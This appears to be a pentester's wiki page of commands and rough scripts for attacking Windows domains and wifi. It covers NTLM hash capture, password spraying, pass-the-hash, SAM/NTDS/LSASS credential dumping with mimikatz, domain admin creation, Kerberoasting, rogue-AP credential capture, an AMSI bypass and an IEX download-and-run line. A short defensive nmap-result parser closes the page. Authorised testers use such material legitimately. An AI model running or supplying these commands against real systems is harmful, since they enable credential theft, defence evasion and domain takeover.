Welcome to the Pentest-Commands-and-dirty-scripts- wiki!
```sh
# List scan only (no probes): resolve every name in hostnames.txt via the chosen DNS server
nmap -sL -R --dns-servers 8.8.8.8 -iL hostnames.txt -vv -oA output
# Screenshot the web services found in a Nessus export
./EyeWitness.py -f /root/blah.nessus --web -d COMPANY --timeout 20 --no-prompt --prepend-https --no-dns
```
## Grab NTLM hashes off the network

Without wpad:
```sh
responder -I eth0
```
With wpad:
```sh
responder -I eth0 --wpad -b -f -F
```
Filter the captures in the logs folder and remove machine accounts (names ending in `$`):
```sh
sort -m *.txt | uniq -d | awk '!/\$/'
```
Cracking with John:
```sh
john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt
```
Use hashcat on a more powerful box. This is only for easy wins.
```sh
samdump2 SYSTEM SAM > hashes.txt
```
```sh
theharvester -d blah.com -l 1000 -b linkedin
# Turn "First Last" lines into first-initial + surname usernames ("John Smith" -> jsmith)
awk '{ print tolower(substr($1,1,1) $NF) }' linkedin-user-list.txt
```
Handy if you have generated a list from LinkedIn or otherwise have a list of names.
```sh
nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"
```
The default username list is located at /usr/local/share/nmap/nselib/data/usernames.lst in Kali. Still works on infra that was upgraded.
```
net use \\IP_ADDRESS\ipc$ "" /user:""
```
```sh
hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V
```
```bat
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL
```
```sh
nmap -script smb-security-mode -p445 -iL 445-open.txt -v10 -T4 -oA smb-signing
# Print the IPs of the hosts whose report block says "signing: disabled"
awk -F "signing: disabled" '/^Nmap/ {a=$0} /signing: disabled/ {print a}' smb-signing.nmap | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > smb-disabled.txt
```
When you have an initial set of compromised creds, run these from a virtual machine.
```
C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser "cmd.exe"
```
Check the DC: `nltest /dsgetdc:domain.local`

To change the DC via the registry so it points at the domain being tested, set the `SiteName` value under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters` to `DC1.domain.com`.
Create a session for use with DumpSec:
```
net use \\10.0.0.1\ipc$ /user:domain.local\username password
net users /domain
net group /domain "Domain Admins"
net accounts /domain
```
Note that the above commands do not work with runas. The PowerView functions below do work with runas.
```powershell
. .\PowerView.ps1
Get-UserProperty -Properties samaccountname
Get-NetGroupMember
Get-DomainPolicy
```
Search shares and files using Invoke-FileFinder and Invoke-ShareFinder.
Run locally on a non-domain-joined machine (remember to add the target domain to the registry):
```powershell
. .\BloodHound.ps1
Invoke-BloodHound
```
Useful when you have a remote shell:
```
powershell Set-ExecutionPolicy RemoteSigned
powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"
```
Use this when you cannot copy BloodHound.ps1 over to the target:
```
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"
```
```sh
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd
```
Impacket psexec.py to boxes (not OPSEC safe: it cleans up afterwards, but installing and running the service leaves logs behind).
```sh
psexec.py user@IP
psexec.py user@IP -hashes ntlm:hash
wmiexec.py user@IP
wmiexec.py user@IP -hashes ntlm:hash
python smbclient.py domain/user@IP -hashes aad3b435b51404eeaad3b435b51404ee:blah
```
```sh
samdump2 SYSTEM SAM > hashes.txt
```
```
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
```
```sh
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
pwdump system sam
```
```
C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
```
To find where NTDS is, run:
```
reg.exe query hklm\system\currentcontrolset\services\ntds\parameters
```
```
C:\> vssadmin list shadows
C:\> vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
```
```sh
secretsdump.py -system system.save -ntds ntds.dit LOCAL
```
Add `-just-dc-ntlm` to extract only the NTLM hashes from NTDS.
```
vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}
```
```
ntdsutil
ntdsutil: snapshot
ntdsutil: list all
ntdsutil: create
snapshot: mount 1
```
Cleanup snapshots:
```
snapshot: list all
snapshot: unmount 1
snapshot: list all
snapshot: delete 1
```
```
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
net user username password /ADD
net localgroup Administrators username /ADD
```
```sh
#!/bin/sh
# Run the same two commands on every host listed in ip.txt (one IP per line)
while read -r ip; do
    pth-winexe -U Admin%hash "//$ip" "ipconfig"
    pth-winexe -U Admin%hash "//$ip" "tasklist /v"
done < ip.txt
```
This is the best script:
https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1
```powershell
Invoke-AutoKerberoast
```
```sh
sudo apt-get install nvidia-367
sudo nvidia-smi
reboot
sudo hashcat -I
# -m 13100 = Kerberos 5 TGS-REP etype 23 (the kerberoast output format)
hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst
```
https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
```sh
lsusb
```
/etc/apt/sources.list:
```
deb http://http.kali.org/kali kali-rolling main non-free contrib
```
```sh
apt-get update
apt-get dist-upgrade
reboot
apt-get install realtek-rtl88xxau-dkms
modprobe 8812au
modinfo 8812au
iwconfig
airodump-ng wlan0
```
```sh
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
apt-get install libssl-dev libnl-genl-3-dev
wget http://hostap.epitest.fi/releases/hostapd-2.6.tar.gz
tar -xvf hostapd-2.6.tar.gz
cd hostapd-2.6/
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch
cd hostapd/
apt-get install pkg-config
apt-get install libssl1.0-dev
make
cd ../../hostapd-wpe/
cd certs/
./bootstrap
./hostapd-wpe hostapd-wpe.conf
```
```sh
airmon-ng check kill
service network-manager start
rfkill list all
rfkill unblock all
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
```
Change channels:
```sh
# Set channel 6, width 40 MHz
sudo iw wlan0 set channel 6 HT40-
# Set channel 149, width 80 MHz
sudo iw wlan0 set freq 5745 80 5775
```
Power:
```sh
sudo iwconfig wlan0 txpower 30
# or
sudo iw wlan0 set txpower fixed 3000
```
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
```sh
sysctl net.ipv4.ip_forward=1
ifconfig eth1 promisc
ifconfig eth2 promisc
```
Important: make sure to connect the host to eth1 first, then eth2 to the switch.
```
FENRIR > create_virtual_tap
FENRIR > set hostIface eth1
hostIface ===> eth1
FENRIR > set host_ip 192.168.31.135
host_ip ===> 192.168.31.135
FENRIR > set host_mac 509a4c505cda
host_mac ===> 509a4c505cda
FENRIR > set netIface eth2
netIface ===> eth2
FENRIR > add_reverse_rule 137 multi IP
New rule added : port = 137 type = multi proto = IP
FENRIR > add_reverse_rule 5355 multi IP
New rule added : port = 5355 type = multi proto = IP
FENRIR > add_reverse_rule 445 unique IP
New rule added : port = 445 type = unique proto = IP
FENRIR > run_debug
```
```sh
route add default gw 10.0.0.42
```
## MS17-010 Nmap Scan
```sh
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 <ip_netblock>
```
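The `smb-security-mode` awk one-liner earlier on this page and the MS17-010 scan above both leave the results buried in nmap's normal output. The parser below is an added example (not part of the original wiki) that reads that output and lists the hosts that still need SMB signing enforced or the MS17-010 patch; the sample nmap output is constructed, not a real scan.

```python
import re

# Constructed sample of nmap normal (.nmap) output for the smb-security-mode and
# smb-vuln-ms17-010 scripts used on this page (not real scan data).
SAMPLE_NMAP = """\
Nmap scan report for fs01.corp.example (10.0.0.5)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for 10.0.0.6
Host script results:
| smb-security-mode:
|_  message_signing: required
| smb-vuln-ms17-010:
|   VULNERABLE:
|_    State: VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
SIGNING_RE = re.compile(r"message_signing:\s*(\w+)")   # disabled / supported / required
STATE_RE = re.compile(r"^\|_?\s+State:\s*(.+?)\s*$")    # e.g. VULNERABLE


def parse_nmap_smb(text):
    """Map each host IP to its message_signing word and its smb-vuln-ms17-010 State."""
    results, ip, in_ms17 = {}, None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                                   # start of a new host block
            ip, in_ms17 = m.group(1), False
            results[ip] = {"signing": None, "ms17_010": None}
        elif ip is None:
            continue
        elif line.startswith("| smb-vuln-ms17-010"):
            in_ms17 = True                      # State: lines below belong to this script
        elif re.match(r"^\| \S", line):
            in_ms17 = False                     # header of some other script
        elif SIGNING_RE.search(line):
            results[ip]["signing"] = SIGNING_RE.search(line).group(1)
        elif in_ms17 and STATE_RE.match(line):
            results[ip]["ms17_010"] = STATE_RE.match(line).group(1)
    return results


def hosts_to_fix(results):
    """Hosts to remediate: signing not required (relay risk) and MS17-010 VULNERABLE."""
    no_sign = sorted(ip for ip, r in results.items() if r["signing"] in ("disabled", "supported"))
    ms17 = sorted(ip for ip, r in results.items() if r["ms17_010"] == "VULNERABLE")
    return no_sign, ms17
```

Note that `supported` (signing enabled but not required) is treated the same as `disabled`, since either allows relaying; only `required` counts as fixed.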